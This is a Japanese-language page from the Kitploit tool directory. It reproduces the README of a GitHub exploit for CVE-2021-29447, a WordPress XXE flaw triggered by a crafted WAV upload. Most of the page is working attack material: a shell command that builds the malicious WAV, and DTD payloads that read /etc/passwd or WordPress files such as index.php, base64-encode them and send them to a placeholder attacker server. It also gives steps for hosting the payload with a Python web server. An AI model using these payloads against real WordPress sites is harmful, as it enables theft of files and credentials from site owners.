Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-29447 — CVE-2021-29447のエクスプロイト。細工されたWAVファイルを介してWordPressで任意のファイル開示とSSRFを可能にし、PoCおよびDTDペイロード生成を含む。 | Kitploit
ツール/GitHubGitHub/assassinukg/cve-2021-29447
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテスト
GitHubassassinukg/cve-2021-29447

CVE-2021-29447

CVE-2021-29447のエクスプロイト。細工されたWAVファイルを介してWordPressで任意のファイル開示とSSRFを可能にし、PoCおよびDTDペイロード生成を含む。

リポジトリを見る
4年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-29447

影響

任意ファイル開示: ホストのファイルシステム上の任意のファイルの内容を取得できる可能性があります。例えば、データベース認証情報などの機密データを含むwp-config.phpなど。 サーバーサイドリクエストフォージェリ (SSRF): HTTPリクエストがWordPressインストールに代わって行われる可能性があります。環境によっては、深刻な影響を与える可能性があります。 脆弱性の悪用

この脆弱性の影響を受けるWordPressサイトが、wpscanツールを使用した列挙プロセスで特定されました。

image

悪意のあるWAVファイルの作成

非常に簡単です。bashコンソールで次のように行います。

nano poc.wav echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

攻撃者のPCに、Webサーバーで実行されるコードを含むdtdファイルを作成します。

root@kitploit:~
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

注: WordPressファイルを読み取るには、構文"../WP-FILE.php"を使用します。

root@kitploit:~
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../index.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

ファイルディレクトリにPythonサーバーを立ち上げます (python3 -m http.server 8081)

参考:

https://github.com/motikan2010/CVE-2021-29447 https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5

ツールをダウンロード